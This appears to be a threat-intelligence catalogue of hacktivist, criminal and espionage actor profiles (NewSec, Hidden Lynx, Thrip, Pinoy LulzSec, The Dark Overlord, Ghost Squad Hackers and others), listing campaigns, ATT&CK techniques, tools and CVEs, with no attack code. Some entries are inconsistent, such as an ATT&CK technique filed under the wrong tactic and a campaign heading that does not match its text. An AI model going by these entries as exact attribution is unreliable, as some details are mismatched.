Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Defense, Education, Financial Services, Government Agencies, Media
Motivations & Objectives: Ideology
Language: Portuguese and English

DESCRIPTION
A group of hacktivists led by a threat actor dubbed DemonSad. The group has been involved in multiple cyber campaigns targeting various countries around the world in order to support civil demonstrations against the authorities. The group was observed conducting mainly DDoS attacks and several data leaks. We assume with medium probability that the group originated from Brazil, mostly due to the fact that some of their tweets are both in English and Brazilian Portuguese. In addition, the Twitter account information of DemonSad and other group members is in Brazilian Portuguese.

CAMPAIGNS

2013 - present - #OpIsrael
A pro-Palestinian and anti-Israel cyber campaign which has occurred annually on April 7 since 2013. NewSec Group claimed responsibility for allegedly shutting down Israeli government websites.

2015 - present - #OpVenezuela
A cyber campaign that protests against the political and socioeconomic crisis in Venezuela. During March 2019, NewSec Group claimed responsibility for shutting down government and official websites of Venezuela.

2018 - 2019 - #OpNicaragua
A cyber campaign that supports the demonstrations against the government. During March 2019, NewSec Group claimed responsibility for shutting down two government websites of Nicaragua.

2018 - 2019 - #OpSudan
A cyber campaign that supports the protests against the Sudanese government. During March 2019, NewSec Group claimed responsibility for shutting down government and official Sudanese websites.

April 2019 - #OpEcuador / #OpAssange
A cyber campaign against Ecuador after they extradited Julian Assange in April 2019. During April 2019, NewSec Group claimed responsibility for shutting down and defacing government and financial websites of Ecuador.

April 2019 - #OpUK
A cyber campaign against the UK because they arrested Julian Assange after Ecuador's extradition. NewSec Group claimed responsibility for shutting down and defacing government and other British websites.

May 2019 - #OpHonduras
A cyber campaign that supports the demonstrations against the government. NewSec Group claimed responsibility for shutting down a government website.

June 2019 - #OpIndonesia
A cyber campaign launched to protest against the violent clashes that followed the Indonesian elections (April 17, 2019) and the announcement of the Indonesian General Elections Commission on May 21, 2019. NewSec Group claimed responsibility for shutting down and leaking data of Indonesian government websites.

June 2019 - #OpHongKong
A cyber campaign launched to support the demonstrations against the government. During June 2019, NewSec Group tweeted a link to a database allegedly stolen from an education institution in Hong Kong. To date, the database is unavailable.

2019 - Targeting Brazilian Websites
NewSec Group claimed responsibility for shutting down and defacing various Brazilian government and official websites, and tweeted links to allegedly related data leaks.

Targeted Countries: Brazil, Ecuador, Hong Kong, Honduras, Israel, Indonesia, Nicaragua, Saudi Arabia, Sudan, United Kingdom, Venezuela
Assumed origin of the attacker: Brazil

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1190 - Exploit Public-Facing Application
Collection
T1005 - Data from Local System
Impact
T1491 - Defacement
T1498 - Network Denial of Service

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: DarknessGhost
Tools used by multiple adversaries: None Identified
Publicly available tools: None Identified
Legitimate software: None Identified
Exploited vulnerabilities: None Identified
Alias: APT 17, ATK2, AURORA PANDA, AXIOM, BARIUM, BLACKFLY, DEPUTY DOG, DOGFISH, GROUP 72, GROUP 8, HIDDEN LYNX, LEAD, RAGEBEAST, TAILGATER
Score: 32
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Defence, Education, Financial Services, Government Agencies, High-Tech Industry, Media
Motivations & Objectives: Espionage
Language: Unknown

DESCRIPTION
ATK2 is a threat group in operation since at least 2009. It was described by Symantec as a professional organization that offers a "hackers for hire" service. They can target multiple organizations with concurrently running attacks, operating efficiently and moving quickly and methodically. The group regularly integrates new zero-day exploits into its arsenal and customizes them quickly, demonstrating a skillset superior to that of APT1, which also operates in that region. Based on these factors, Symantec estimates that the group would need to be made up of between 50 and 100 individuals. The infrastructure used during the attacks mostly originated from China.
This group is composed of two sub-groups using two different backdoors to achieve different goals:
• The team which distributes the Moudoor backdoor, a customized version of Gh0st RAT. They are responsible for large-scale attacks which require a large number of people to operate.
• The team which distributes the Naid backdoor, used during the Bit9 attack, the VOHO campaign and the Aurora Operation. This team seems to operate against high-value targets and to be composed of more skillful attackers.

TOOLS, MALWARES AND VULNERABILITIES

Malwares: BLACKCOFFEE
Legitimate software: None
Exploited vulnerabilities: CVE-2011-0611, CVE-2013-3893, CVE-2012-4792, CVE-2012-1875, CVE-2012-1535, CVE-2011-0609, CVE-2011-2110, CVE-2014-0322

Targeted Countries: Australia, Canada, China, France, Germany, Hong Kong, India, Japan, Russia, Singapore, South Korea, Taiwan, United Kingdom, United States
Assumed origin of the attacker: China

CAMPAIGNS

Operation Aurora
The Aurora malware operation was identified recently and made public by Google and McAfee. This malware operation has been associated with intellectual property theft, including source code and technical diagrams (CAD, oil exploration bid data, etc.). Companies hit have been publicly speculated, including Google, Adobe, Yahoo, Symantec, Juniper Systems, Rackspace, Northrop Grumman, ExxonMobil, ConocoPhillips, and Dow Chemical. The malware package used with Aurora is mature and has been in development since at least 2006. As a result of the attack, Google stated in its blog that it plans to operate a completely uncensored version of its search engine in China "within the law, if at all", and acknowledged that if this is not possible it may leave China and close its Chinese offices. Official Chinese sources claimed this was part of a strategy developed by the U.S. government.

Attack on the French Aerospace
A strategic web compromise leveraging the CVE-2014-0322 zero-day to infect victims with the ZxShell malware targeted the website of the Veterans of Foreign Wars, a U.S. organization. One month before this attack, another threat group used the same vulnerability to conduct attacks against the French aerospace sector and compromise the website of Capstone Turbine, a U.S.-based turbine manufacturer.

Operation DeputyDog
Operation led by the Hidden Lynx group. Links have been established with the Ephemeral Hydra and Snow Man campaigns. This operation targets Japan in particular.

Operation Ephemeral Hydra
Operation led by the Hidden Lynx group (ATK2). Links have been established with the DeputyDog and SnowMan campaigns. The targets are not known, but the use of a watering hole site is known. This site is of strategic importance and is visited by people interested in national and international security policies.

Timeline: Jan-2010 Operation Aurora; Aug-2013 Operation DeputyDog; Nov-2013 Operation Ephemeral Hydra; Feb-2014 French Aerospace-focused CVE-2014-0322 attack, which shares similarities with the 2012 Capstone Turbine activity.

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1189 - Drive-by Compromise
Persistence
T1060 - Registry Run Keys / Startup Folder
Defense Evasion
T1140 - Deobfuscate/Decode Files or Information
Command and Control
T1071 - Standard Application Layer Protocol
T1132 - Data Encoding
T1043 - Commonly Used Port
T1094 - Custom Command and Control Protocol
Alias: ATK78, THRIP
Score: 32
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Aerospace, Communication, Defence, High-Tech
Motivations & Objectives: Espionage; Gathering information on satellite operating infrastructure
Language: Unknown

DESCRIPTION
Thrip is a Chinese cyber-espionage group targeting the telecommunications, geospatial imaging and defence sectors in the United States and Southeast Asia. Thrip was uncovered in January 2018 by Symantec during a campaign targeting an important telecommunication operator in Southern Asia. On the day of its publication, the article from Symantec described five custom malware families: Rikamaru, Catchamas, Mycicil, Spedear and Syndicasec. But this article has since been modified, maybe due to a mistake, and nothing remains but the Catchamas info stealer trojan. Because of these circumstances, the information presented here is given with moderate confidence.

CAMPAIGNS

Thrip targets Southeast Asia
In January 2018, it was discovered that Thrip had launched an espionage campaign against a major telecommunications operator in Southeast Asia that had been going on since 2017. During the last wave of attack, which began in 2017, Thrip had targeted a satellite communications operator. The attack group seemed to be particularly interested in the operational side of the company, looking for and infecting computers running software that monitors and controls satellites. This suggests to us that Thrip's motives go beyond espionage and may also include disruption.

TOOLS, MALWARES AND VULNERABILITIES

Malwares: Catchamas
Legitimate software: LogMeIn, Mimikatz, PsExec, PowerShell, WinSCP
Exploited vulnerabilities: None

Targeted Countries: Philippines, Taiwan, United States, Vietnam
Assumed origin of the attacker: China

MODUS OPERANDI (ATT&CK FRAMEWORK)

Execution
T1086 - PowerShell
Persistence
T1098 - Account Manipulation
Credential Access
T1003 - Credential Dumping
T1098 - Account Manipulation
Exfiltration
T1048 - Exfiltration Over Alternative Protocol
Command and Control
T1219 - Remote Access Tools
Alias: ATK 129, Pinoy LulzSec, TAG-HA9
Score: 31
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors: Administration, Aviation, Defense, Education, Food and Agriculture, Government Agencies, Healthcare, Manufacturing, Military, Political Organizations, Retail, Transportation
Motivations & Objectives: Personal-satisfaction, Unpredictable
Language: Filipino, English

DESCRIPTION
Pinoy LulzSec is the Philippines branch of the international LulzSec movement, and therefore embraces an anarchist/destructive ideology. According to their statements, Pinoy LulzSec hacktivists have allegedly been active since 2012. However, we found the bulk of their activity concentrated in 2017-2018. The group was responsible for numerous cyber-attacks in the past years, including notable ones against the Philippine Government and defense forces in the April 2018 and 2019 Fool's Day campaigns. The hackers conducted dozens of attacks during these campaigns, mostly website defacements and data leaks, which were subsequently dumped online on file-sharing platforms. We also observed numerous social media account takeovers, ostensibly performed via spear-phishing. The hackers show a clear preference for attacking government-related targets, but also have a penchant for education institutions. This finding suggests that they are teenagers, still going to school. This assumption is corroborated by their erratic behavior and the vulgar language used on social media. In fact, in line with their modus operandi and search for visibility, the hacktivists run multiple social media accounts, mainly on Twitter and Facebook, where they announce their future intentions and boast about their attacks. Of note, the hackers have been conducting defacement attacks against poorly secured websites in over 30 countries worldwide, indicating that they largely operate out of opportunity instead of ideological reasons.
Pinoy LulzSec's prominent members: X-m3n, GrandFather, Kangk0ng, Soull.

CAMPAIGNS

September 2016 - Commission on Elections (COMELEC) Attack
Pinoy LulzSec hacked into COMELEC, exfiltrating the databases hosted therein.

Early April 2018 - April Fool's Day 2018 Attacks
In this campaign, Pinoy LulzSec launched numerous attacks against Philippine Government websites, those of Philippine local authorities, and education institutions. Website defacements, DDoS attacks, and data leaks were the prominent attack vectors.

April 24, 2018 - Government of Thailand
The hackers defaced six distinct Thai Government websites. The motivation behind the attack is ostensibly recreational.

April 27, 2018 - Government of Nepal
The hackers published a Nepal Government database on a text-sharing platform. The motivation behind the attack is likely recreational.

Early April 2019 - April Fool's Day 2019 Attacks
On this occasion, the hackers conducted numerous cyber-attacks against a variety of targets, government and corporate alike, the most notable being the breach of the Armed Forces of the Philippines (AFP) data center and the subsequent leaking of soldiers' data online. As in the previous year's campaign, the hackers conducted defacements, DDoS attacks, data leaks, and social media account takeovers.

April 5, 2019 - Jollibee Foods Corporation Hack
Pinoy LulzSec hackers leaked the database of the Filipino food chain Jollibee on a text-sharing platform.

April 24, 2019 - Cebu Pacific Air Hack
The Pinoy LulzSec hacker kangk0ng gained unauthorized access to Cebu Pacific Air's rewards program GetGo. The hackers defaced the GetGo homepage, but also managed to access the company's active directory, possibly stealing sensitive data.

April 30, 2019 - jointhearmy[.]ph Hack
A member of Pinoy LulzSec named kangk0ng compromised the recruitment portal of the Philippine Army, jointhearmy[.]ph, dumping a database with personally identifiable information of 50,000 alleged applicants.



Targeted Countries _
Afghanistan, Bangladesh, Brazil, Canada, Central African Republic, China, Dominica, Egypt, France, Gabon, Germany, Hungary, India, Indonesia, Iran, Italy, Japan, Malaysia, Mali, Mexico, Nepal, Nigeria, Pakistan, Philippines, Poland, Singapore, Taiwan, Thailand, Tunisia, United Kingdom, United States, Venezuela

Assumed origin of the attacker _ The Philippines

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1190 - Exploit Public-Facing Application
T1192 - Spearphishing Link

Impact
T1491 - Defacement
T1498 - Network Denial of Service

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: PinoyLulzSec DoS tool
Tools used by multiple adversaries: None Identified
Publicly available tools: None Identified

Legitimate software: None Identified

Exploited vulnerabilities: None Identified

Alias _ ATK 73, THE DARK OVERLORD, TDO, TAG-CR4
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _
Motivations & Objectives _ Personal-gain
Score _ 29
Language _ English

DESCRIPTION
The Dark Overlord is a highly skilled cybercrime actor (possibly a well-structured cybercrime syndicate) active since at least mid-2016. It entered the public spotlight following the 2017 hack of Larson Studios and the subsequent release of an entire season of the TV show "Orange is the New Black." The Dark Overlord's key business model is to hack into low, medium and high-profile organizations, mostly in the healthcare, education, and media production sectors in the US and UK, and subsequently put the stolen data up for sale or demand ransom from its victims. The Dark Overlord appears to primarily be a financially driven threat actor, with a proven history of success and likely millions of dollars in profits. The threat actor has been prevalently active on Darknet marketplaces and hacking forums, where it tries to sell "private" databases (databases that are not in the public domain yet), but also other goods, such as software source code.

Alleged members: Nathan Wyatt AKA "Crafty Cockney"/"mas" - alleged member arrested in September 2016. Grant West AKA "Courvoisier" - alleged member arrested in Kent (UK) in May 2018. S.S. - alleged member arrested in Belgrade (Serbia) on May 16, 2018.
CAMPAIGNS

2016 - Extortion of US Organizations
The Dark Overlord started their operation by targeting a variety of organizations in the United States. Most of the organizations were from the medical sector, but the group also targeted the financial and high-tech industries. The group demanded ransom for not releasing sensitive documents and patients' medical records.

2016 - HL7 Software Stolen
The Dark Overlord offered for sale what they claimed to be the source code, software signing keys and customer license database for a Health Level Seven interface engine.

2017 - Threats to US Schools
Parents received text messages from The Dark Overlord threatening to harm or kill their children.

2016 - Larson Studios Hack
Somewhere around December 2016, The Dark Overlord were able to get access to the network of Larson Studios, a Hollywood audio post-production studio. According to Larson Studios, the group was able to breach the network through an endpoint running an outdated version of Windows 7. The group was able to download a large number of TV shows the studio was working on and delete them from the company servers. They then claimed they would release the shows if the studio did not pay them $50,000 (which the studio eventually did).

Jun 2017 - Netflix Attack
The Dark Overlord leaked unaired episodes of "Orange is the New Black" stolen in the Larson Studios hack. According to the group, they decided to leak the information after Larson Studios broke the agreement with them by going to the FBI, and as a way to pressure Netflix to pay.

Jan 2019 - 9/11 Papers
The Dark Overlord hacked US and UK companies and exfiltrated a large volume of sensitive documents related to the lawsuits over the 9/11 terror attacks.

Timeline: 2016 Extortion of US Organizations; 2016 HL7 Software Stolen; Dec-2016 Larson Studios Hack; 2017 Threats to US schools; Jun-2017 Netflix attack; Jan-2019 9/11 Papers.



Targeted Countries _
United Kingdom, United States

Assumed origin of the attacker _ Serbia, United States, United Kingdom

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1133 - External Remote Services
T1190 - Exploit Public-Facing Application

Persistence
T1133 - External Remote Services

Discovery
T1046 - Network Service Scanning

Impact
T1485 - Data Destruction

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: None Identified
Tools used by multiple adversaries: None Identified
Publicly available tools: None Identified

Legitimate software: TrueCrypt/Veracrypt

Exploited vulnerabilities: None Identified

Alias _ ATK 125, BLUE DRAGON, IZNAYE CYBER TEAM, TAG-HA4
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Administration, Defense, Education, Energy, Government Agencies, High-Tech, Hospitality, Manufacturing, Political Organizations, Research, Retail
Motivations & Objectives _ Ideology
Score _ 29
Language _ English, French, Spanish

DESCRIPTION
IZNAYE CYBER TEAM is considered to be a hacktivist attack group. According to its Twitter account, the group started recruiting members during May 2019. The group is considered to be a Russian attack group, as it uses the Russian Federation flag in its Twitter account and cites a quote attributed to the Soviet revolutionary leader Lenin. However, a few of its members are not Russian speakers and we get the impression that it is a multinational attack group also consisting of French and Spanish speakers. Its main objectives are governmental institutions, but not only: among its targets are also commercial organizations and local authorities, and it was seen joining mainly hacktivist campaigns. Quoting Lenin may suggest the group's agenda is driven by a communist ideology. We also noticed that the group has ties to another hacktivist team dubbed Pryzraky Group, since one of the IZNAYE CYBER TEAM's members, named xS1lenc3d, had taken responsibility under the Pryzraky insignia. Another member, dubbed Aft3RNOON_000, was seen taking responsibility for operations conducted together with "Team Gh0st". We have the impression that the above-mentioned cooperation relates to common causes and ideology.

CAMPAIGNS

2019 - #OpSudan
On April 5, 2019, the group declared they had joined #OpSudan, a hacktivist cyber campaign against Omar Al-Bashir's regime in Sudan. In this campaign, the group targeted multiple Sudanese Government-related domains in defacement, data leak and DDoS attacks. Among the websites that were targeted were those of Khartoum Police, the Sudanese Embassy in Germany and more.

2019 - #OpIsrael
During April 2019, the group joined the pro-Palestinian and anti-Israel cyber campaign which has occurred annually on April 7 since 2013. On April 11, 2019, the group was also mentioned in tweets regarding its part in a DDoS attack targeting israeltoday.co.il, an Israeli news website. On the same day the group claimed that it had leaked files, emails and subdomains of the Israeli Ministry of Defence. The group was also mentioned in taking down alvarion.co.il, an Israel-based technology company. According to various tweets, these activities were conducted in cooperation with #Dext3r & @Cyberc0v3nsec.

2019 - #OpEcuador Campaign / #OpFreeAssange / #OpAssange
During April 2019, the group joined the hacktivist campaign targeting the government of Ecuador in response to the extradition of WikiLeaks founder Julian Assange to the authorities in the UK. Starting April 14 through April 19, 2019, the group took part in various cyber-attacks on websites related to the government of Ecuador and commercial websites in the UK.

2019 - #OpFrance
A hacktivist campaign first launched by Anonymous in solidarity with the Yellow Vests Movement (Mouvement des gilets jaunes) in France. On April 11, 2019, the group took part in a cyber attack targeting the DynDNS France website (dyndns.fr). On May 1, 2019, a group member dubbed xS1lenc3d leaked approximately 70,000 emails belonging to customers of Peugeot France. The leak being published on May 1, 2019, a symbolic day for communists, might support the assumption that the group or some of its actors hold a communist ideology.

2019 - #OpCatalonia / #OpCatlogne
On April 5, 2019, the group tweeted that some of its members would join #OpCatalonia, a hacktivist cyber campaign first launched in 2017 that targets Spanish targets in support of Catalonia's independence.

2019 - #OpHonduras
A hacktivist campaign that accuses the Honduras regime of being oppressive and tyrannical. During May 2019, the group claimed to have targeted a series of Honduras government websites.

Timeline: Apr-2019 #OpSudan; Apr-2019 #OpIsrael; Apr-2019 #OpEcuador Campaign / #OpFreeAssange / #OpAssange; Apr-2019 #OpFrance; Apr-2019 #OpCatalonia / #OpCatlogne; May-2019 #OpHonduras.



Targeted Countries _
Brazil, Colombia, Ecuador, France, Indonesia, Israel, Italy, Peru, Spain, Sudan

Assumed origin of the attacker _ Russia

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1190 - Exploit Public-Facing Application

Credential Access
T1003 - Credential Dumping

Lateral Movement
T1021 - Remote Services

Exfiltration
T1499 - Endpoint Denial of Service

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: None Identified
Tools used by multiple adversaries: None Identified
Publicly available tools: None Identified

Legitimate software: None Identified

Exploited vulnerabilities: WordPress

Alias _ ATK77, DARKHYDRUS, LAZYMEERKAT
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Government Agencies
Motivations & Objectives _ Espionage
Score _ 28
Language _ Unknown

DESCRIPTION
ATK77 (DarkHydrus) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks.

CAMPAIGNS

New Threat Actor Group DarkHydrus Targets Middle East Government
In July 2018, Unit 42 analysed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus.

Latest Target Attack of DarkHydrus Group Against Middle East
360 Threat Intelligence Center captured several lure Excel documents written in Arabic on January 9, 2019. It is confirmed that this is a new DarkHydrus Group attack targeting the Middle East region.

Timeline: Jul-2018 New threat actor group DarkHydrus targets Middle East government; Jan-2019 Latest target attack of DarkHydrus group against Middle East.

TOOLS, MALWARES AND VULNERABILITIES

Malwares: RogueRobin

Legitimate software: Cobalt Strike, Mimikatz, Phishery

Exploited vulnerabilities: CVE-2018-8414



Targeted Countries _
Iran, Middle East

Assumed origin of the attacker _ Unknown

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1193 - Spearphishing Attachment

Execution
T1086 - PowerShell
T1204 - User Execution

Defense Evasion
T1221 - Template Injection

Credential Access
T1187 - Forced Authentication

Command and Control
T1094 - Custom Command and Control Protocol

Alias _ ATK 136, Sprek3rsSec, TAG-HA17
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Education, Government Agencies, Media
Motivations & Objectives _ Ideology
Score _ 28
Language _ Portuguese

DESCRIPTION
Sprek3rsSec is a Brazilian hacktivist active since 2014. Sprek3rsSec mostly targets Brazilian websites for defacement and data leak attacks. In the past the actor was part of a group called Evil Corp BR, which operated between 2016 and 2017. Since 2019 the actor has been part of a group called !PHALLANX!. While mostly flying under the radar, the threat actor gained publicity in the 2019 #OpAmazonia campaign. The threat actor seems to possess low to medium hacking skills, mostly relying on SQLi techniques and XSS vulnerabilities.

CAMPAIGNS

2014-2017 - Defacement
From the start of his activities the threat actor focused on defacements of random websites, the majority of them from the BR TLD (Brazilian websites).

2019 - #OpAmazonia
Sprek3rsSec took part in #OpAmazonia, a hacktivist operation to protest against the burning of the rain forest. As part of the operation Sprek3rsSec, as a member of PHALLANX, allegedly hacked several ministry offices and leaked data from them. Among the hacked targets was the Ministry of the Environment; according to the group, they were able to find proof that the Brazilian government started the fire in the Amazon forest.

Timeline: 2014-2017 Defacement; 2019 #OpAmazonia.

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: DarknessGhost
Tools used by multiple adversaries: None Identified
Publicly available tools: SQLMAP

Legitimate software: None Identified

Exploited vulnerabilities: None Identified



Targeted Countries _
Brazil, France, Gabon, India, Mexico, New Zealand, Poland, Thailand

Assumed origin of the attacker _ Brazil

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1190 - Exploit Public-Facing Application

Execution
T1064 - Scripting

Persistence
T1100 - Web Shell

Defense Evasion
T1064 - Scripting

Impact
T1491 - Defacement

Alias _ ATK 135, GHOST SQUAD HACKERS, TAG-HA6
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Communication, Education, Financial Services, Government Agencies, International Organizations, Media, Military, Political Organizations
Motivations & Objectives _ Ideology
Score _ 26
Language _ English

DESCRIPTION
The Ghost Squad Hackers, a group founded in 2016, are hacktivists from around the world that have launched cyber-attacks against multiple targets around the world. In 2016, they were considered to be one of the top trending hacktivist groups. Several popular cyber-attacks that are affiliated with the group are the DDoS attacks against GitHub (January 2019), YouTube (October 2018) and the mail servers of CNN and Fox News (June 2016). A prominent group member dubbed S1ege developed several tools and published their code on GitHub.

CAMPAIGNS

2013 - present - #OpIsrael
A pro-Palestinian and anti-Israel cyber campaign which has occurred annually on April 7 since 2013. During August 2016, Ghost Squad Hackers claimed responsibility for allegedly shutting down Israeli government websites.

2016 - present - #OpISIS / #OpReverseCaliphate / #OpDecryptIsis
A cyber campaign against ISIS-related online platforms. Ghost Squad Hackers targeted ISIS-related platforms on Twitter, Telegram, WhatsApp etc. and leaked information.

2016 - 2018 - #OpIndia
A cyber campaign against Indian websites and online platforms. Ghost Squad Hackers claimed responsibility for defacing Indian government and additional websites between 2016 and 2018.

January 2016 - Targeting Ethiopian government websites
During January 2016, Ghost Squad Hackers defaced several Ethiopian government websites to protest against the violent clashes between students and the security forces.

April 2016 - Targeting KKK
In April 2016, Ghost Squad Hackers claimed responsibility for shutting down a website affiliated with the KKK.

May 2016 - #OpTrump
A cyber campaign against websites related to Donald Trump to protest against one of his speeches. In May 2016, Ghost Squad Hackers shut down the Trump Hotel Collection website for several hours.

May 2016 - #OpIcarus
A cyber campaign against the financial sector around the world that was first launched in February 2016. Since then, hacktivists have launched several additional phases of this campaign over the years. During May 2016, Ghost Squad Hackers claimed responsibility for shutting down various websites of financial institutions in the UK, Cameroon, Kuwait, Korea, Myanmar, New Zealand and Nepal.

June 2016 - #OpSilence
A cyber campaign against the media sector to protest against its coverage of the Israeli-Palestinian conflict. During June 2016, Ghost Squad Hackers claimed responsibility for shutting down the mail servers of Fox News and CNN. They also published links to data leakages allegedly related to the US Army. The data leakages contained personal information and email accounts. In addition, they claimed they had shut down the website of the Prime Minister of Israel (pmo.gov.il).

June 2016 - #OpKillary
A cyber campaign against Hillary Clinton. During June 2016, Ghost Squad Hackers threatened to leak personal information related to Hillary Clinton and claimed responsibility for shutting down her website and additional websites of her funders.

July 2016 - #OpTurkey
A cyber campaign against Turkish government websites to protest against the Turkish support for ISIS. During July 2016, Ghost Squad Hackers claimed responsibility for shutting down Turkish government websites.

July 2016 - #OpAltonSterling
A cyber campaign protesting police brutality after Alton Sterling, a 37-year-old black man, was shot at close range by two police officers in Baton Rouge, Louisiana in July 2016. In July 2016, Ghost Squad Hackers defaced a subdomain of the website of Baton Rouge City.

July 2016 - #OpKillingBay
A cyber campaign against websites related to the Sea World industry and countries that hunt sea mammals, such as Japan, Denmark etc. In July 2016, Ghost Squad Hackers claimed responsibility for shutting down the seaworldparks.com website.

July & August 2016 - #OpAfghan
A cyber campaign against the government



of Afghanistan to protest against its political relationship with the USA and against the situation of the Hazaras, a Shia minority in Afghanistan and Pakistan. During July and August 2016, Ghost Squad Hackers defaced several Afghan government websites and hacked the Twitter account of Afghanistan's Chief Executive Officer Dr. Abdullah Abdullah.

October 2016 - #OpSyria
A cyber campaign against the Syrian government to protest against the war crimes committed there. During October 2016, Ghost Squad Hackers claimed responsibility for shutting down Syrian government websites.

November 2016 - #NODAPL
A cyber campaign that supports the protests against the Dakota Access Pipeline. During November 2016, Ghost Squad Hackers claimed responsibility for shutting down several United Nations-related websites and called on the organization to stop oil companies from ruining U.S. water.

January 2017 - #OpThailand
A cyber campaign against websites related to the Thai government. During January 2017, Ghost Squad Hackers claimed responsibility for defacing various Thai government websites.

May - August 2018 - #OpPeru
A cyber campaign against Peruvian websites. In May and August 2018, Ghost Squad Hackers claimed responsibility for defacing various Peruvian websites related to government and educational institutions.

2018 - #OpBrazil
A cyber campaign against the Brazilian government. During 2018, Ghost Squad Hackers claimed responsibility for defacing websites and leaking information allegedly related to the Brazilian government.

May 2018 - #OpRussia
A cyber campaign against Russian websites because the Russian government blocked the use of Telegram in the country. During May 2018, Ghost Squad Hackers claimed responsibility for defacing the website of a Russian telecommunication company and shutting down a website of a Russian bank.

June 2018 - Targeting Canadian websites
During June 2018, Ghost Squad Hackers hacked a server and defaced various Canadian websites.

June 2018 - Targeting Cuban websites
During June 2018, Ghost Squad Hackers hacked a server and defaced various Cuban websites.

June 2018 - Targeting websites of Bangladesh government
During June 2018, Ghost Squad Hackers defaced several websites belonging to the government of Bangladesh.

2018 - Targeting Polish websites
In June 2018, Ghost Squad Hackers defaced a Polish government website.

July 2018 - Targeting Argentinian websites
During July 2018, Ghost Squad Hackers defaced various Argentinian government, educational and additional websites.

August 2018 - Targeting Zimbabwean websites
In August 2018, Ghost Squad Hackers defaced a website related to the government of Zimbabwe.

October 2018 - Targeting YouTube
In October 2018, a member of Ghost Squad Hackers, Hax Stroke, claimed responsibility for shutting down the YouTube website, which suffered from an outage and was unavailable for an hour. However, they did not provide any proof that they caused the outage.

January 2019 - Targeting GitHub
In January 2019, a member of Ghost Squad Hackers, Hax Stroke, claimed responsibility for shutting down GitHub by abusing RPCBIND services to carry out a massive DDoS attack.

February 2018 - 2019 - #OpSudan
A cyber campaign that supports the protests against the Sudanese government. During February 2019, Ghost Squad Hackers claimed responsibility for shutting down Sudanese government and official websites.

August 2019 - Targeting government websites of Ecuador
During August 2019, Ghost Squad Hackers claimed responsibility for shutting down government websites of Ecuador in order to protest against Julian Assange's extradition in April 2019.

Timeline: 2013 #OpIsrael; 2016 #OpISIS / #OpReverseCaliphate / #OpDecryptIsis; Jan-2016 Targeting Ethiopian government websites; 2016 #OpIndia; Apr-2016 Targeting KKK; May-2016 #OpTrump; May-2016 #OpIcarus; Jun-2016 #OpSilence; Jun-2016 #OpKillary; Jul-2016 #OpTurkey; Jul-2016 #OpAltonSterling; Jul-2016 #OpKillingBay; Jul-Aug-2016 #OpAfghan; Oct-2016 #OpSyria; Nov-2016 #NODAPL; Jan-2017 #OpThailand; 2018 #OpBrazil; Feb-2018-2019 #OpSudan; May-Aug-2018 #OpPeru; May-2018 #OpRussia; Jun-2018 Targeting Canadian websites; Jun-2018 Targeting Cuban websites; Jun-2018 Targeting websites of Bangladesh government; Jul-2018 Targeting Argentinian websites; Aug-2018 Targeting Zimbabwean websites; Oct-2018 Targeting YouTube; Jan-2019 Targeting GitHub; Aug-2019 Targeting government websites of Ecuador.

Targeted Countries _
Afghanistan, Argentina, Bangladesh, Brazil, Canada, Cameroon, Cuba, Ecuador, India, Israel, Kuwait, Myanmar, Nepal, New Zealand, Peru, Poland, South Korea, Sudan, Syria, Thailand, Turkey, United Kingdom, United Nations, Zimbabwe

Assumed origin of the attacker _ Worldwide

MODUS OPERANDI (ATT&CK FRAMEWORK)

Collection
T1005 - Data from Local System

Impact
T1491 - Defacement
T1498 - Network Denial of Service

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: GhostSquadHackers-Javascript-Encrypter-Encoder, GhostDelivery, RedGhost Linux post exploitation framework
Tools used by multiple adversaries: Saphyra DDoS Tool, MILNET
Publicly available tools: None Identified

Legitimate software: RPCBIND abuse

Exploited vulnerabilities: None Identified

Alias _ ATK 141, LORIAN SYNARO, @LORIANSYNARO, TAG-HA15
Threat Actor _ Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _ Financial Services, Government Agencies
Motivations & Objectives _ Ideology
Score _ 26
Language _ English

DESCRIPTION
Lorian Synaro is a hacktivist threat actor affiliated with the Anonymous collective. He has been active since at least March 2018, when he joined Twitter. Lorian Synaro has taken part in various hacktivist campaigns. He mainly publishes claims that he has taken target websites offline, although he has also claimed to have defaced multiple websites, as well as leaking information from targeted organizations. In addition, he is highly engaged in promoting hacktivist campaigns and sharing the activities of his fellow hacktivists.

TOOLS, MALWARES AND VULNERABILITIES

Malwares
Custom tools: None Identified
Tools used by multiple adversaries: None Identified
Publicly available tools: None Identified

Legitimate software: None Identified

Exploited vulnerabilities: None Identified



Targeted Countries _
Congo, France, Gabon, Honduras, Israel, Nicaragua, Saudi Arabia, Spain, Sudan, Venezuela, Zimbabwe

Assumed origin of the attacker _ Unknown

CAMPAIGNS
